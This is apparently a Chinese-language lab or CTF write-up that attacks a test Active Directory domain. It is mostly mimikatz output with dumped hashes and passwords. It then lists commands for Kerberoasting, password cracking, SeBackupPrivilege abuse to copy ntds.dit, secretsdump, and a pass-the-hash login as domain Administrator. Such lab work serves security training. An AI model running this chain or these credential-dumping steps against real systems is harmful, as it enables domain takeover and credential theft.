mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 5971088 (00000000:005b1c90)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/10 19:32:26
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5970395 (00000000:005b19db)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/10 19:32:26
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5969701 (00000000:005b1725)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/10 19:32:26
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3150114 (00000000:00301122)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/10 19:13:09
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3150084 (00000000:00301104)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/10 19:13:09
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : wSbEajHzZs
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3108560 (00000000:002f6ed0)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/10 19:13:08
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64330 (00000000:0000fb4a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:24
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 8519c5a89b2cd4d679a5a36f26863e5d
         * SHA1     : 42d8188bc30ff0880b838e368c6e5522b86f978d
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64312 (00000000:0000fb38)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:24
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:23
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 32395 (00000000:00007e8b)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:23
SID               :
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5985359 (00000000:005b544f)
Session           : RemoteInteractive from 3
User Name         : ocean
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/10 19:32:27
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : ocean
         * Domain   : XR-0923
         * NTLM     : 579da618cfbfa85247acf1f800a280a4
         * SHA1     : 39f572eceeaa2174e87750b52071582fc7f13118
        tspkg :
        wdigest :
         * Username : ocean
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : ocean
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5985329 (00000000:005b5431)
Session           : RemoteInteractive from 3
User Name         : ocean
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/10 19:32:27
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : ocean
         * Domain   : XR-0923
         * NTLM     : 579da618cfbfa85247acf1f800a280a4
         * SHA1     : 39f572eceeaa2174e87750b52071582fc7f13118
        tspkg :
        wdigest :
         * Username : ocean
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : ocean
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3109913 (00000000:002f7419)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/10 19:13:08
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3109437 (00000000:002f723d)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/10 19:13:08
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:26
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:24
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33498 (00000000:000082da)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:23
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33470 (00000000:000082be)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:23
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : a4f432e39e79dc4ad8b85854ed243f61
         * SHA1     : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/10 18:43:23
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :
        cloudap :

拿到flag

拿着这个机器的用户的hash去查看下spn

发现tianjing

proxychains4 python3 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':a4f432e39e79dc4ad8b85854ed243f61' -dc-ip 172.22.14.11 -request-user tianjing

用john爆破下hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

去登录一下

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2  

发现SeBackupPrivilege权限

SeBackupPrivilege 拷贝 sam

首先在本地创建一个raj.r2dsh文件，这里命名为raj.dsh，内容如下

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

接下来再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距

unix2dos raj.dsh

我们在C:/下创建一个test文件夹进去将raj.dsh拷贝进来

mkdir test 
cd test
upload raj.dsh

最后 卷影拷贝

diskshadow /s raj.dsh

然后复制到当前目录 

RoboCopy /b z:\windows\ntds . ntds.dit

然后备份注册表，再下载到本地

reg save hklm\system system
download system

然后用impacket-secretsdump解密

impacket-secretsdump -ntds ntds.dit -system system local

拿到域管的hash打pth

proxychains4 python3 smbexec.py -hashes :70c39b547b7d8adec35ad7c09fb1d277 Administrator@172.22.14.11